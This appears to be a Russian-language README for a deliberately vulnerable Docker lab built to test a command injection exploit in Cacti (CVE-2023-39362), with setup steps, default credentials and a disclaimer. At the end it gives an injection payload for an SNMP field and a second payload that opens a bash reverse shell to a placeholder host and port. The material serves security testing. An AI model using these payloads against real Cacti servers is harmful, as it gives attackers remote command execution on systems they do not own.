
ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для тестирования эксплойта для инъекции команд в Cacti (CVE-2023-39362). Запускайте на свой страх и риск!
Это уязвимое приложение для проверки эксплойта для уязвимости Cacti (CVE-2023-39362).
Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать изолированную среду с резервным копированием (например, виртуальную машину с недавним снимком и сетью только для хоста). Не загружайте это приложение на серверы, доступные из Интернета, так как они будут скомпрометированы.
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Я не несу ответственности за то, как кто-либо использует это приложение. Единственная цель этого приложения — быть тестовым сценарием для эксплойта CVE-2023-39362, и его не следует использовать со злым умыслом. Если ваш сервер будет скомпрометирован при установке этого приложения, это не моя ответственность, а ответственность лица(лиц), которые его загрузили и установили.
Вот шаги по настройке среды:
docker compose up -d, чтобы запустить композицию.admin/admin.admin.guest.guest, чтобы попробовать эксплойт.Контейнер будет называться vuln-cacti.
Имя хоста для тестового SNMP-устройства — monitored_snmp_device.
Для удаления среды используйте команду docker compose down.
Официальное руководство по установке Cacti можно найти здесь.
Подробное описание первопричины уязвимости доступно в оригинальном уведомлении о безопасности или в моем блоге.
(Это только один из возможных эксплойтов)
public\' ; touch /tmp/m3ssap0 ; \'./tmp.Для получения обратного шелла можно использовать полезную нагрузку, подобную следующей.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Этот проект лицензирован под лицензией Unlicense - подробности см. в файле LICENSE.